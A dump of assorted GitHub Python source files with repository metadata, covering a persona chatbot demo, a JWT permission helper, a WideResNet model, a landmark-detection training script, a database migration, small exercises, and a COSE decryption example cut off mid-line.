\"today was not too bad, I actually felt good but I feel like my roommate thinks I'm dirty\"]\n\n\nqualities = '\\n'.join(qualitiesList)\njournal_entries = '\\n'.join(journalList)\n\nprint(qualities, journal_entries)\n\nprompt = f\"\"\"\nYou are going to write a detailed description of a person based on general characteristics of this person and a collection of personal diary entries that this person wrote.\n\nThis person has the following qualities and characteristics:\n{qualities}\n\nThe person wrote the following things in their personal journal:\n{journal_entries}\n\nWrite a detailed description of this using these information.\n\"\"\"\n\nprint(prompt)\n\n\ndef generate(prompt):\n response = openai.Completion.create(\n model='text-davinci-003',\n prompt=prompt,\n temperature=0.3,\n max_tokens=600,\n top_p=1.0,\n frequency_penalty=0,\n presence_penalty=0\n )\n\n return response.choices[0].text\n\ndef generateChatPrompt(personality, memory):\n prompt = f\"\"\"You are acting as a person with the following description: {personality}\n \nConversation so far:\n{memory}\n\nReply to this conversation acting as the person described by the description.\n\n\"\"\"\n return prompt\n\ndef generateMemory(prevText, username, identityName):\n memory = \"\"\n talkers = [username, identityName]\n idx = 0\n for text in prevText[-5:]:\n talker = talkers[(idx)%2]\n idx += 1\n memory += (talker + \": \")\n memory += (text + '\\n\\n')\n #print(memory)\n \n return memory\n\n# personalityDescription = generate(prompt)\n# print(personalityDescription)\npersonalityDescription = \"This person is a complex individual who is often moody and unpredictable. They can lash out to people close to them and are prone to bouts of crying. They often feel misunderstood and can be hard to read. In their personal diary entries, they express a range of emotions from feeling good to feeling like their roommate thinks they are dirty. This person is likely to be a deep thinker, who is constantly reflecting on their life and the world around them. They are likely to be a sensitive soul, who is easily hurt by the words and actions of others. They are likely to be a passionate person, who is driven by their emotions and feelings.\"\n\ninputText = \"\"\nprevText = []\n\nusername = \"username123\"\nidentityname = \"Mark\"\n\nmarkyIdentity = Personality()\n\nwhile inputText != 'q':\n inputText = input()\n prevText.append(inputText)\n #print(prevText)\n\n memory = generateMemory(prevText, username, identityname)\n prompt = generateChatPrompt(personalityDescription, memory)\n #print(prompt)\n outputText = generate(prompt)\n prevText.append(outputText)\n print(outputText)","repo_name":"bjmoonn/hacksc-2023","sub_path":"chatbot-demo.py","file_name":"chatbot-demo.py","file_ext":"py","file_size_in_byte":2999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70575000409","text":"# -*- coding: utf-8 -*-\n\nfrom eaglet.core import api_resource\nfrom eaglet.decorator import param_required\nfrom eaglet.core import watchdog\nfrom eaglet.core.exceptionutil import unicode_full_stack\nfrom business.station_message.message_repository import MessageRepository\nfrom business.station_message.user_has_message_repository import UserHasMessageRepository\n\nclass AMessages(api_resource.ApiResource):\n \"\"\"\n 商品分类集合\n \"\"\"\n app = \"message\"\n resource = \"messages\"\n\n @param_required(['corp_id:int'])\n def get(args):\n # corp = args['corp']\n # messages = corp.message_repository.get_messages()\n msgrepo = MessageRepository()\n uhm_repo = UserHasMessageRepository()\n\n\n messages = msgrepo.get_messages()\n datas = []\n for message in messages:\n is_read = uhm_repo.get_user_has_message(args['corp_id'], message.id).is_read\n datas.append({\n 'id': message.id,\n 'title': message.title,\n 'content': message.content,\n 'created_at': message.created_at.strftime('%Y-%m-%d %H:%M'),\n 'is_read': is_read\n })\n unread_count = uhm_repo.get_unread_count(args['corp_id'])\n\n return {\n 'messages': datas,\n 'unread_count': unread_count\n }","repo_name":"chengdg/gaia","sub_path":"api/message/a_messages.py","file_name":"a_messages.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40663183923","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nsimulate a set of sequences\n\"\"\"\nimport os\nimport sys\nimport numpy as np\n\nAA = ['A', 'R', 'N', 'D', 'C', 'Q', 'E', 'G', 'H', 'I', 'L', 'K',\n 'M', 'F', 'P', 'S', 'T', 'W', 'Y', 'V']\n\nSEQ_LEN = 21\nSEQ_NUM = 10\ndef random_seq(seqlen):\n seq = []\n for i in range(seqlen):\n seq.append(AA[np.random.randint(0,19)])\n return ''.join(seq)\n\nwith open('random_seq.fasta','w') as w_f:\n for i in range(SEQ_NUM):\n print >> w_f,'>seq'+str(i)\n seq = random_seq(SEQ_LEN)\n for s in [seq[i:i+80] for i in range(0,len(seq),80)]:\n print >> w_f,s\n\n","repo_name":"lituan/tools","sub_path":"simulate_seq.py","file_name":"simulate_seq.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6413832228","text":"from ast import operator\nfrom flask_jwt_extended import create_access_token\nclass verificador:\n\n \n\n def generaToken(idUsuario):\n return create_access_token(identity=idUsuario)\n \n\n def validaUsuario(idUsuario,operacion):\n respuesta = True\n operacion = operacion.replace(\"/\",\"\")\n permisos = {\n '12345':['sensores','autorizacion'],\n '99999':['sensores','autorizacion','reglas']\n }\n\n if(idUsuario not in permisos):\n respuesta = False\n else:\n if(operacion not in permisos[idUsuario]):\n respuesta = False \n\n return respuesta\n\n","repo_name":"jaalruta/arquitecturas-agiles-de-software-grupo-11","sub_path":"flaskr/componentes/verificador.py","file_name":"verificador.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5996919894","text":"import server\nimport logging\nimport skeletons\nimport sockets\n\n\nclass GameServer:\n def __init__(self, port: int, game_server: server.GameServer) -> None:\n \"\"\"\n Creates a dm_client given the dm_server dm_server to use\n :param port: The math dm_server port of the host the dm_client will use\n \"\"\"\n super().__init__()\n self._state = skeletons.SharedServerState(game_server, port)\n logging.basicConfig(filename=server.LOG_FILENAME,\n level=server.LOG_LEVEL,\n format='%(asctime)s (%(levelname)s): %(message)s')\n\n def run(self) -> None:\n \"\"\"\n Runs the dm_server\n \"\"\"\n print(\"Boot do server.\")\n skeletons.ServerControlSession(self._state).start()\n\n with sockets.Socket.create_server_socket(self._state.port, server.ACCEPT_TIMEOUT) as server_socket:\n logging.info(\"Waiting for clients to connect on port \" + str(self._state.port))\n\n while self._state.keep_running:\n self._state.concurrent_clients.acquire()\n client_socket = server_socket.accept()\n if client_socket is not None:\n self._state.add_client(client_socket)\n skeletons.ClientSession(self._state, client_socket).start()\n else:\n self._state.concurrent_clients.release()\n\n logging.info(\"Waiting for clients to terminate...\")\n\n logging.info(\"Server stopped\")\n","repo_name":"Miner2317/Distributed-Terminal-Based-Multiplayer-Minesweeper","sub_path":"MinesweeperServer/dm_server/skeletons/game_server.py","file_name":"game_server.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"18304358618","text":"'''\n@Author: Yuan Wang\n@Contact: wangyuan2020@ia.ac.cn\n@File: train.py\n@Time: 2021/12/02 09:59 AM\n'''\n\nimport os\nimport math\nimport time\nimport numpy as np\nfrom scipy import io\nimport torch.optim as optim\nfrom torch.autograd import Variable\nfrom torch.utils.data import DataLoader\nfrom torch.utils.tensorboard import SummaryWriter\nfrom torch.optim.lr_scheduler import CosineAnnealingLR, StepLR\n\nfrom init import *\nfrom My_args import *\nfrom augmentations import *\nfrom dataset import FaceLandmarkData\nfrom loss import AdaptiveWingLoss\nfrom util import main_sample\nfrom PAConv_model import PAConv\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\ndef train(args):\n writer = SummaryWriter('runs/3D_face_alignment')\n if args.need_resample:\n main_sample(args.num_points, args.seed, args.sigma, args.sample_way, args.dataset)\n # Dataset Random partition\n FaceLandmark = FaceLandmarkData(partition='trainval', data=args.dataset)\n train_size = int(len(FaceLandmark) * 0.7)\n test_size = len(FaceLandmark) - train_size\n torch.manual_seed(args.dataset_seed)\n # Prepare the dateset and dataloader \n train_dataset, test_dataset = torch.utils.data.random_split(FaceLandmark, [train_size, test_size])\n train_loader = DataLoader(train_dataset, num_workers=1, batch_size=args.batch_size, shuffle=True, drop_last=True)\n test_loader = DataLoader(test_dataset, num_workers=1, batch_size=args.test_batch_size, shuffle=True, drop_last=True)\n # data argument\n ScaleAndTranslate = PointcloudScaleAndTranslate()\n MOMENTUM_ORIGINAL = 0.1\n MOMENTUM_DECCAY = 0.5\n\n # select a model to train\n model = PAConv(args, 8).to(device) # 68 in FaceScape; 8 in BU-3DFE and FRGC\n model.apply(weight_init)\n model = nn.DataParallel(model)\n\n print('let us use', torch.cuda.device_count(), 'GPUs')\n if args.loss == 'adaptive_wing':\n criterion = AdaptiveWingLoss()\n elif args.loss == 'mse':\n criterion = nn.MSELoss()\n if args.use_sgd:\n print(\"Use SGD\")\n opt = optim.SGD(model.parameters(), lr=args.lr*100, momentum=args.momentum, weight_decay=args.weight_decay)\n else:\n print(\"Use Adam\")\n opt = optim.Adam(model.parameters(), lr=args.lr, eps=1e-08, weight_decay=args.weight_decay)\n if args.scheduler == 'cos':\n scheduler = CosineAnnealingLR(opt, T_max=100, eta_min=0.0001)\n elif args.scheduler == 'step':\n scheduler = StepLR(opt, step_size=40, gamma=0.9)\n\n loss_epoch = 0.0\n for epoch in range(args.epochs):\n iters = 0\n model.train()\n for point, landmark, seg in train_loader:\n seg = torch.where(torch.isnan(seg), torch.full_like(seg, 0), seg)\n iters = iters + 1\n if args.no_cuda == False:\n point = point.to(device) # point: (Batch * num_point * num_dim)\n landmark = landmark.to(device) # landmark : (Batch * landmark * num_dim)\n seg = seg.to(device) # seg: (Batch * point_num * landmark)\n point_normal = normalize_data(point) # point_normal : (Batch * num_point * num_dim)\n point_normal = ScaleAndTranslate(point_normal)\n opt.zero_grad()\n point_normal = point_normal.permute(0, 2, 1) # point : (batch * num_dim * num_point)\n pred_heatmap = model(point_normal)\n\n # Compute the loss fucntion \n loss = criterion(pred_heatmap, seg.permute(0, 2, 1).contiguous())\n loss.backward()\n loss_epoch = loss_epoch + loss\n opt.step()\n print('Epoch: [%d / %d] Train_Iter: [%d /%d] loss: %.4f' % (epoch + 1, args.epochs, iters, len(train_loader), loss))\n if (epoch + 1) % 5 == 0:\n torch.save(model.state_dict(), './checkpoints/%s/%s/models/model_epoch_%d.t7' % (args.exp_name, args.dataset, epoch+1))\n if args.scheduler == 'cos':\n scheduler.step()\n elif args.scheduler == 'step':\n if opt.param_groups[0]['lr'] > 1e-5:\n scheduler.step()\n if opt.param_groups[0]['lr'] < 1e-5:\n for param_group in opt.param_groups:\n param_group['lr'] = 1e-5\n writer.add_scalar('3D_Face_Alignment_loss', loss_epoch / ((epoch + 1) * len(train_loader)), epoch + 1)\n\n\nif __name__ == \"__main__\":\n # Training settings\n args = parser.parse_args()\n _init_()\n args.cuda = not args.no_cuda and torch.cuda.is_available()\n train(args)\n\n\n\n\n","repo_name":"wangyuan123ac/3DFA-GCN","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4539,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"31"} +{"seq_id":"22543992124","text":"import logging\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n'''看模型如何处理三个不同的输入'''\n#打印一些日志信息\nlogger = logging.getLogger(__name__)\n\n \ndef mish(x):\n \"\"\"Mish: A Self Regularized Non-Monotonic Neural Activation Function (https://arxiv.org/abs/1908.08681)\"\"\"\n return x * torch.tanh(F.softplus(x))\n\n#相当于一个自定义的batchNorm函数,好像模型中并没有用到\n#可以尝试将普通的bn层换成自定义的bn层\nclass PSBatchNorm2d(nn.BatchNorm2d):\n \"\"\"How Does BN Increase Collapsed Neural Network Filters? (https://arxiv.org/abs/2001.11216)\"\"\"\n\n def __init__(self, num_features, alpha=0.1, eps=1e-05, momentum=0.001, affine=True, track_running_stats=True):\n super().__init__(num_features, eps, momentum, affine, track_running_stats)\n self.alpha = alpha\n\n def forward(self, x):\n return super().forward(x) + self.alpha\n\n#模型结构不复杂时,使用Sequential,模型结构复杂时,使用forward\n#模型中的第一个小模块\nclass BasicBlock(nn.Module):\n def __init__(self, in_planes, out_planes, stride, drop_rate=0.0, activate_before_residual=False):\n super(BasicBlock, self).__init__()\n #定义每个层都是什么\n self.bn1 = nn.BatchNorm2d(in_planes, momentum=0.001)\n self.relu1 = nn.LeakyReLU(negative_slope=0.1, inplace=True)\n self.conv1 = nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,\n padding=1, bias=False)\n self.bn2 = nn.BatchNorm2d(out_planes, momentum=0.001)\n self.relu2 = nn.LeakyReLU(negative_slope=0.1, inplace=True)\n self.conv2 = nn.Conv2d(out_planes, out_planes, kernel_size=3, stride=1,\n padding=1, bias=False)\n self.drop_rate = drop_rate\n #如果二者相等,那么当前值为true,否则为false\n self.equalInOut = (in_planes == out_planes)\n #如果输入输出的维度不匹配,此时无法直接进行残差链接,需要先进行一个卷积实现维度的匹配\n #之后再进行残差\n self.convShortcut = (not self.equalInOut) and nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride,\n padding=0, bias=False) or None\n self.activate_before_residual = activate_before_residual\n\n #定义数据x的处理方式,如何流动\n def forward(self, x):\n #如果输入输出维度不同,并且activate_before_residual为true\n # 那么x先经过一个卷积加上一个relu\n '''这里判断是否需要先经过一个卷积和relu'''\n if not self.equalInOut and self.activate_before_residual == True:\n x = self.relu1(self.bn1(x))\n #否则直接就得到out\n else:\n out = self.relu1(self.bn1(x))\n #如果输入输出的维度相同,那么此时经过第二个卷积和relu的值就是out,否则是x\n out = self.relu2(self.bn2(self.conv1(out if self.equalInOut else x)))\n #判断是否需要dropout\n if self.drop_rate > 0:\n out = F.dropout(out, p=self.drop_rate, training=self.training)\n out = self.conv2(out)\n #从前两者中选择一个与out相加\n #输入输出的维度相同时直接进行残差,输入输出的维度不相同时,需要先经过卷积调整维度\n return torch.add(x if self.equalInOut else self.convShortcut(x), out)\n\n#模型中的第二个小模块\n#这里的block是由上面的BasicBlock组成的,相当于NetworkBlock中有nb_layers个BasicBlock\nclass NetworkBlock(nn.Module):\n def __init__(self, nb_layers, in_planes, out_planes, block, stride, drop_rate=0.0, activate_before_residual=False):\n super(NetworkBlock, self).__init__()\n #根据给定的参数创建一个小模块,之后直接将x输入到这个模块中\n self.layer = self._make_layer(\n block, in_planes, out_planes, nb_layers, stride, drop_rate, activate_before_residual)\n\n def _make_layer(self, block, in_planes, out_planes, nb_layers, stride, drop_rate, activate_before_residual):\n layers = []\n #一共有多少层,每一层都是一个BasicBlock\n for i in range(int(nb_layers)):\n #i == 0 and in_planes or out_planes决定了第一个参数\n #i == 0 and stride or 1决定了第三个参数\n layers.append(block(i == 0 and in_planes or out_planes, out_planes,\n i == 0 and stride or 1, drop_rate, activate_before_residual))\n return nn.Sequential(*layers)\n #最终将输入x经过多个BasicBlock之后得到输出\n def forward(self, x):\n return self.layer(x)\n\n#定义最终的wideresnet模型代码\n#一个wideresnet由多个NetworkBlock和其他的池化,relu等模块组成\n#一个NetworkBlock由多个BasicBlock组成\nclass WideResNet(nn.Module):\n def __init__(self, num_classes, depth=28, widen_factor=2, drop_rate=0.0):\n super(WideResNet, self).__init__()\n #输出的维度越来越大\n channels = [16, 16*widen_factor, 32*widen_factor, 64*widen_factor]\n assert((depth - 4) % 6 == 0)\n n = (depth - 4) / 6 #每个WideResNet中堆叠多少个BasicBlock\n #传递这个类名,后期直接往这个类名中传递参数\n block = BasicBlock\n # 1st conv before any network block\n #输入大小是3,输出大小是16\n self.conv1 = nn.Conv2d(3, channels[0], kernel_size=3, stride=1,\n padding=1, bias=False)\n # 1st block\n self.block1 = NetworkBlock(\n n, channels[0], channels[1], block, 1, drop_rate, activate_before_residual=True)\n # 2nd block\n self.block2 = NetworkBlock(\n n, channels[1], channels[2], block, 2, drop_rate)\n # 3rd block\n self.block3 = NetworkBlock(\n n, channels[2], channels[3], block, 2, drop_rate)\n # global average pooling and classifier\n self.bn1 = nn.BatchNorm2d(channels[3], momentum=0.001)\n self.relu = nn.LeakyReLU(negative_slope=0.1, inplace=True)\n self.fc = nn.Linear(channels[3], num_classes)\n #最终的输出是channels[3]的维度\n self.channels = channels[3]\n #对模型中的参数进行初始化\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight,\n mode='fan_out',\n nonlinearity='leaky_relu')\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1.0)\n nn.init.constant_(m.bias, 0.0)\n elif isinstance(m, nn.Linear):\n nn.init.xavier_normal_(m.weight)\n nn.init.constant_(m.bias, 0.0)\n\n def forward(self, x):\n out = self.conv1(x)#channels[0]\n out = self.block1(out)#channels[1]\n out = self.block2(out)#channels[2]\n out = self.block3(out)#channels[3]\n out = self.relu(self.bn1(out))\n out = F.adaptive_avg_pool2d(out, 1)\n #最终的维度进行展平,不管是多少通道的,最终都变成一维\n out = out.view(-1, self.channels)\n #将展平之后的维度变成最终的类别数,从而可以进行分类\n #相当于从三维最终到了num_classes维\n return self.fc(out)\n\n\ndef build_wideresnet(depth, widen_factor, dropout, num_classes):\n logger.info(f\"Model: WideResNet {depth}x{widen_factor}\")\n return WideResNet(depth=depth,\n widen_factor=widen_factor,\n drop_rate=dropout,\n num_classes=num_classes)\n","repo_name":"zzziCode/fixmatch-pytorch","sub_path":"models/wideresnet.py","file_name":"wideresnet.py","file_ext":"py","file_size_in_byte":7766,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"14544655826","text":"# A\ndef reorderDigits(list, direction):\n x = []\n for i in list:\n if direction == \"asc\":\n x.append(int(\"\".join(sorted(str(i)))))\n elif direction == \"desc\":\n x.append(int(\"\".join(sorted(str(i), reverse=True))))\n print(x)\n\nreorderDigits([515, 341, 98, 44, 211], \"asc\")\nreorderDigits([515, 341, 98, 44, 211], \"desc\")\nreorderDigits([63251, 78221], \"asc\")\nreorderDigits([63251, 78221], \"desc\")\nreorderDigits([1, 2, 3, 4], \"asc\")\nreorderDigits([1, 2, 3, 4], \"desc\")\n\n\n# B\ndef canPartition(list):\n for i in range(0, len(list)):\n x = list[i]\n list.pop(i)\n y = 1\n for j in list:\n y *= j\n if x == y:\n print(\"true\")\n break\n list.insert(i, x)\n else:\n print(\"false\")\n\ncanPartition([2,8,4,1])\ncanPartition([-1,-10,1,-2,20])\ncanPartition([-1,-20,5,-1,-2,2])\n\n\n\n\n\n\n\n","repo_name":"Jkim2308/WeeklyCodingChallenge","sub_path":"Week2/Week2.py","file_name":"Week2.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8504128933","text":"#!/usr/bin/python env python3\r\n\r\nimport numpy as np\r\nimport fplib \r\n\r\ndef readvasp(vp):\r\n buff = []\r\n with open(vp) as f:\r\n for line in f:\r\n buff.append(line.split())\r\n\r\n lat = np.array(buff[2:5], float)\r\n try:\r\n typt = np.array(buff[5], int)\r\n except:\r\n del(buff[5])\r\n typt = np.array(buff[5], int)\r\n nat = sum(typt)\r\n pos = np.array(buff[7:7 + nat], float)\r\n types = []\r\n for i in range(len(typt)):\r\n types += [i+1]*typt[i]\r\n types = np.array(types, int)\r\n rxyz = np.dot(pos, lat)\r\n return lat, rxyz, types\r\n\r\ndef test():\r\n znucl = [14, 8]\r\n lat1, rxyz1, types1 = readvasp('struct1.vasp')\r\n lat2, rxyz2, types2 = readvasp('struct2.vasp')\r\n\r\n cell1 = (lat1, rxyz1, types1, znucl)\r\n cell2 = (lat2, rxyz2, types2, znucl)\r\n fp1 = fplib.get_lfp(cell1, cutoff=6, log=True)\r\n fp2 = fplib.get_lfp(cell2, cutoff=6, log=True)\r\n\r\n dist = fplib.get_fp_dist(fp1, fp2, types1)\r\n\r\n print ('fingerprint distance between struct1 and struct2: ', dist)\r\n\r\nif __name__ == \"__main__\":\r\n test()\r\n","repo_name":"zhuligs/fplib","sub_path":"examples/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"31"} +{"seq_id":"8302865898","text":"\"\"\"Initial migration\n\nRevision ID: 78c2284225d0\nRevises: \nCreate Date: 2021-09-14 20:33:51.472108\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '78c2284225d0'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('champions',\n sa.Column('id', sa.Integer(), autoincrement=False, nullable=False),\n sa.Column('name', sa.String(), nullable=False),\n sa.Column('icon_url', sa.String(), nullable=True),\n sa.PrimaryKeyConstraint('id', name=op.f('pk_champions'))\n )\n with op.batch_alter_table('champions', schema=None) as batch_op:\n batch_op.create_index(batch_op.f('ix_champions_id'), ['id'], unique=False)\n\n op.create_table('skins',\n sa.Column('id', sa.Integer(), autoincrement=False, nullable=False),\n sa.Column('name', sa.String(), nullable=False),\n sa.Column('trimmed_image_url', sa.String(), nullable=True),\n sa.Column('full_image_url', sa.String(), nullable=True),\n sa.Column('champion_id', sa.Integer(), nullable=False),\n sa.Column('description', sa.String(), nullable=True),\n sa.Column('price', sa.Integer(), nullable=True),\n sa.Column('sale_price', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['champion_id'], ['champions.id'], name=op.f('fk_skins_champion_id_champions')),\n sa.PrimaryKeyConstraint('id', name=op.f('pk_skins'))\n )\n with op.batch_alter_table('skins', schema=None) as batch_op:\n batch_op.create_index(batch_op.f('ix_skins_id'), ['id'], unique=False)\n\n op.create_table('price_history',\n sa.Column('skin_id', sa.Integer(), nullable=False),\n sa.Column('date', sa.Date(), nullable=False),\n sa.Column('price', sa.Integer(), nullable=True),\n sa.Column('sale_price', sa.Integer(), nullable=True),\n sa.Column('is_available', sa.Boolean(), server_default='false', nullable=False),\n sa.Column('is_on_sale', sa.Boolean(), server_default='false', nullable=False),\n sa.ForeignKeyConstraint(['skin_id'], ['skins.id'], name=op.f('fk_price_history_skin_id_skins')),\n sa.PrimaryKeyConstraint('skin_id', 'date', name=op.f('pk_price_history'))\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('price_history')\n with op.batch_alter_table('skins', schema=None) as batch_op:\n batch_op.drop_index(batch_op.f('ix_skins_id'))\n\n op.drop_table('skins')\n with op.batch_alter_table('champions', schema=None) as batch_op:\n batch_op.drop_index(batch_op.f('ix_champions_id'))\n\n op.drop_table('champions')\n # ### end Alembic commands ###\n","repo_name":"Remian103/lolskin-price-tracker","sub_path":"backend/alembic/versions/78c2284225d0_initial_migration.py","file_name":"78c2284225d0_initial_migration.py","file_ext":"py","file_size_in_byte":2723,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"43821416165","text":"namelist=[]\nagelist=[]\nidlist=[]\nmoblist=[]\nindex=0\nwhile(1):\n try:\n print(\"Welcome to the Customer Management System\")\n print(\"Please select your choice from given below : \")\n print(\"1.Add Customer\",\"2.Update Customer\",\"3.Remove Customer\",\"4.Search Customer\",\"5.Display All\",\"6.Exit\",sep=\"\\n\")\n x=int(input(\"Please Enter your Choice here : \"))\n # ----------------------------(Add Customer)-----------------------------------------------------------------------\n if(x==1):\n index+=1\n print(\"Enter the Details of the Customer\")\n a=input(\"Enter the Name of the Customer : \")\n namelist.append(a)\n while(1):\n b=input(\"Enter the Age of the Customer : \")\n if(b.isnumeric()):\n agelist.append(b)\n break\n else:\n print(\"Please Enter Age only in Numeric Form\")\n while(1):\n c=input(\"Please Enter your 10 Digit Mobile Number : \")\n if(c.isnumeric()):\n moblist.append(c)\n break\n else:\n print(\"Please enter a valid mobile number\")\n idlist.append(index)\n print(namelist,agelist,idlist,moblist,sep='\\n')\n # ----------------------(update Customer)------------------------------------------------------------------------------\n if(x==2):\n while(1):\n id=input(\"Enter Customer ID :\")\n if(id.isnumeric()):\n id=int(id)\n namelist.pop(id)\n agelist.pop(id)\n moblist.pop(id)\n a = input(\"Enter the Name : \")\n namelist.insert(id,a)\n while(1):\n b = input(\"Enter the Age of Customer\")\n if(b.isnumeric()):\n b=int(b)\n agelist.insert(id,b)\n break\n else:\n print(\"Please enter valid age\")\n while(1):\n c = input(\"Enter Mobile Number : \")\n if(c.isnumeric()):\n moblist.insert(id,c)\n break\n else:\n print(\"Please enter valid mobile number\")\n break\n # ---------------------------------------------------------------------------------------------------------------------\n # -------------------------------------(Remove Customer)---------------------------------------------------------------\n elif(x==3):\n while (1):\n id = input(\"Enter Customer ID :\")\n if (id.isnumeric()):\n id = int(id)\n id-=1\n namelist.pop(id)\n agelist.pop(id)\n moblist.pop(id)\n idlist.pop(id)\n print(\"Customer Removed Sucessfully\")\n break\n else:\n print(\"Please Enter Valid Customer ID\")\n # ---------------------------------------------------------------------------------------------------------------------\n # -----------------------------------(Search Customer)-----------------------------------------------------------------\n elif (x==4):\n while (1):\n id = input(\"Enter Customer ID :\")\n if (id.isnumeric()):\n id=int(id)\n index=idlist.index(id)\n name=namelist[index]\n age=agelist[index]\n mob=moblist[index]\n print(\"Name :\",name,\"Age : \",age,\"Mobile No. : \",mob,sep=\"\\n\")\n break\n else:\n print(\"The Please enter a valid ID\")\n # ---------------------------------------------------------------------------------------------------------------------\n # -----------------------------(Display All)---------------------------------------------------------------------------\n elif(x==5):\n for i in range(len(idlist)):\n print(\"Cus. Name :\",namelist[i],\"Cus. Age :\",agelist(i),\"Cus. ID :\",idlist(i),\"Cus. Mobile :\",moblist(i))\n elif(x==6):\n print(\"Thankyou\")\n except Exception as e:\n print(\"Error\",e)\n# ---------------------------------------------------------------------------------------------------------------------","repo_name":"hapmishra/Customer-Management-System","sub_path":"Basic_code_consolbased.py","file_name":"Basic_code_consolbased.py","file_ext":"py","file_size_in_byte":4643,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"28447143412","text":"import os\nimport uvicore\nfrom uvicore import log\nfrom uvicore.support import str\nfrom uvicore.console import command, argument\nfrom uvicore.support.dumper import dump, dd\nfrom uvicore.support.schematic import Schematic\n\n\n@command()\n@argument('name')\nasync def command(name: str):\n \"\"\"\n \\b\n Generate a new CLI command schematic...\n \\b\n USAGE:\n Commands should be lower_underscore and SINGULAR (plural is OK)\n Remember to manually add the command to your service provider!\n \\b\n ./uvicore gen command welcome\n ./uvicore gen command process\n ./uvicore gen command scan_files\n \"\"\"\n\n stub = os.path.dirname(__file__) + '/stubs/command.py'\n dest = uvicore.config('app.paths.commands') + '/' + name + '.py'\n\n Schematic(\n type='command',\n stub=stub,\n dest=dest,\n replace = [\n ('xx_name', name)\n ]\n ).generate()\n\n # Get running package\n package = uvicore.app.package(main=True)\n\n log.nl()\n log.header('Add this to your Service Provider boot() or define_commands self.commands()')\n print(\"'{}': '{}.commands.{}.cli',\".format(str.kebab(name), package.name, name))\n\n log.nl()\n log.notice('IF you do NOT have a self.commands() already in your Service Provider, add this')\n print(\"\"\"self.commands(\n group='{}',\n help='{} Commands',\n commands={{\n '{}': '{}.commands.{}.cli',\n }}\n)\"\"\".format(\n package.short_name,\n str.studly(package.short_name),\n str.kebab(name),\n package.name,\n name,\n ))\n","repo_name":"uvicore/framework","sub_path":"uvicore/console/commands/generators.py","file_name":"generators.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"31"} +{"seq_id":"1457200485","text":"#!/usr/bin/env python3\n\nimport base64\nfrom cbor2 import dumps\nfrom cwt import COSE, COSEKey\n\n# See Section 6.1.4 Example (AES-KW)\n# https://datatracker.ietf.org/doc/html/draft-ietf-suit-firmware-encryption#name-example\nprint(\"Example 1: AES-KW\")\nsecret_key_jwk = {\n \"kty\": \"Symmetric\",\n \"k\": \"61\" * 16, # 0x61 = 'a'\n \"alg\": \"A128KW\",\n \"kid\": \"kid-1\",\n}\nprint(f\"Secret COSE_Key: {secret_key_jwk}\")\nfor key in [\"k\"]:\n secret_key_jwk[key] = base64.b64encode(bytes.fromhex(secret_key_jwk[key])).decode()\nwith open(\"./encrypted-payload-aes-kw-aes-gcm.hex\", \"r\") as f:\n encrypted_payload_hex = ''.join(f.read().splitlines())\nprint(f\"Encrypted Payload: {encrypted_payload_hex}\")\nwith open(\"./suit-encryption-info-aes-kw-aes-gcm.hex\", \"r\") as f:\n suit_encryption_info_hex = ''.join(f.read().splitlines())\nprint(f\"SUIT_Encryption_Info: {suit_encryption_info_hex}\")\n\n# Decrypt the Encrypted Payload using SUIT_Encryption_Info\n# NOTE: python-cwt does not support detached content feature used in SUIT Encrypted Payloads\n# With this feature, the payload is encoded with `null` (0xF6 in hex)\n# and can be replaced with bstr wrapped encrypted_payload.\n\n# 1. Generate bstr wrapped encrypted_payload in hex\nencrypted_payload_bytes = bytes.fromhex(encrypted_payload_hex)\nencrypted_payload_bstr_hex = dumps(encrypted_payload_bytes).hex()\n\n# 2. Replace `null` (0xF6 in hex) by bstr wrapped encrypted_payload\n# NOTE: Skip 13 bytes (26 characters) of protected and unprotected headers\nindex = suit_encryption_info_hex.find(\"F6\", 26)\nassert index >= 0\ncose_encrypt_hex = suit_encryption_info_hex[0:index] + encrypted_payload_bstr_hex + suit_encryption_info_hex[index + 2:]\n\nprint(f\"\\nConcatenated COSE_Encrypt (non detached content): {cose_encrypt_hex}\")\ncose_encrypt_bytes = bytes.fromhex(cose_encrypt_hex)\n\nsecret_key = COSEKey.from_jwk(secret_key_jwk)\n\nctx = COSE.new()\nresult = 